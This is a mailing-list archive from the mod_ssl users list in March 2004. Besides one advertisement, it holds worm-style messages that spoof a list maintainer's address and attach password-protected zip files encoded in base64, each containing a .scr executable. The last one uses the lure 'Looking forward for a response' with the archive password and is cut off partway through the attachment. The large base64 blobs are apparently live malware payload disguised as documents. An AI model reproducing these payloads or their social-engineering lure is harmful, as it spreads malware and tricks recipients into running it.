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
AAAAAAEAAQA6AAAAIlQAAAAA

----------dgjaohgyngxycqslmlvt--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From sales@steelwatersolutions.com  Wed Mar 17 11:40:47 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mailsvcs.mail.pas.earthlink.net (mailsvcs.mail.pas.earthlink.net [207.217.120.251])
	by master.modssl.org (Postfix) with ESMTP id A7631A8966
	for ; Wed, 17 Mar 2004 11:40:31 +0100 (CET)
Received: from root by mailsvcs.mail.pas.earthlink.net with local-bsmtp (Exim 3.33 #1)
	id 1B3YTM-0000YU-00
	for modssl-users-l@master.modssl.org; Wed, 17 Mar 2004 02:40:28 -0800
Received: from dsc01-cir-oh-207-95-2-97.rasserver.net ([207.95.2.97] helo=midwest.net)
	by epic.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 1B2qwt-0000KL-00
	for modssl-users-l@master.modssl.org; Mon, 15 Mar 2004 04:12:03 -0800
Message-ID: <20040315061408.75E8AED02A8686CC@steelwatersolutions.com>
From: "Steelwater Solutions Corporation" 
To: modssl-users-l@master.modssl.org
Subject: NMEA-0183 Made Easy
Date: 15 Mar 2004 06:14:11 -0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0012_50557CC2.BA96402E"


------=_NextPart_000_0012_50557CC2.BA96402E
Content-Type: text/plain
Content-Transfer-Encoding: 8bit

NMEA Express 2.0 Available!

Finally, Windows software to communicate with your NMEA-0183 based products 
effortlessly!

+ Receive, transmit, and log data
+ Display parameters, values, and units
+ Generate html based reports
+ Parity calculator
+ Handle third-party multilevel sentences
+ Automated Scanning
+ Date/Time stamps, timers, and alarms
+ Sentence triggering
+ Product web links
+ Customizable preferences
+ Many more features…

Obtain details and download FREE trial at: 
www.steelwatersolutions.com

Steelwater Solutions Corporation
P.O. Box 42, 208 S. Walnut
DeSoto, IL  62924-0042

Toll Free (877) 338-0361
Fax (866) 205-6250
support@steelwatersolutions.com

This is a limited mailing. If you do not wish to receive advertisements 
from Steelwater Solutions Corporation via e-mail,  please contact us above 
to be removed from any future mailings and accept our apologies for any 
inconvenience. 
               
Copyright © 2004 Steelwater Solutions Corporation. All rights reserved.
------=_NextPart_000_0012_50557CC2.BA96402E
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable




 


This is a limited mailing. If you do not wish to receive=
 advertisements from Steelwat=
er Solutions Corporation via e-mail, please contact us at support@steelwatersolutions.com to =
be removed from any future mailings and accept our apologies for any inconve=
nience.



------=_NextPart_000_0012_50557CC2.BA96402E--


From owner-modssl-users@modssl.org  Thu Mar 18 03:44:51 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 69087A8962; Thu, 18 Mar 2004 03:44:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from odin.org (CPE-144-136-53-92.vic.bigpond.net.au [144.136.53.92])
	by master.modssl.org (Postfix) with SMTP id 56384A8938
	for ; Thu, 18 Mar 2004 03:44:49 +0100 (CET)
Date: Thu, 18 Mar 2004 13:54:30 +1000
To: modssl-users@modssl.org
Subject: Re: Msg reply
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 18 04:00:57 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3DEEAA8A51; Thu, 18 Mar 2004 04:00:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from jslee2.com (218-36-37-138.rev.krline.net [218.36.37.138])
	by master.modssl.org (Postfix) with SMTP id 35841A8962
	for ; Thu, 18 Mar 2004 04:00:55 +0100 (CET)
Date: Thu, 18 Mar 2004 11:59:20 +0900
To: modssl-users@modssl.org
Subject: Site changes
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 18 05:30:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7F065A8962; Thu, 18 Mar 2004 05:30:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from seewise.com (h-68-164-240-82.snvacaid.covad.net [68.164.240.82])
	by master.modssl.org (Postfix) with SMTP id F33E1A8934
	for ; Thu, 18 Mar 2004 05:30:06 +0100 (CET)
Date: Wed, 17 Mar 2004 20:29:31 -0800
To: modssl-users@modssl.org
Subject: Hidden message
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 18 08:46:59 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 46F20A8A59; Thu, 18 Mar 2004 08:46:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from kob (www.kr.ksc.co.th [203.155.142.130])
	by master.modssl.org (Postfix) with SMTP id BFE28A8A4F
	for ; Thu, 18 Mar 2004 08:46:53 +0100 (CET)
Date: Thu, 18 Mar 2004 14:46:49 +0700
To: modssl-users@modssl.org
Subject: :-)
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dodyahoxkkkiepmvheyv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dodyahoxkkkiepmvheyv
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 Looking forward  for a response :P

password  for archive: 70224

----------dodyahoxkkkiepmvheyv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"

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
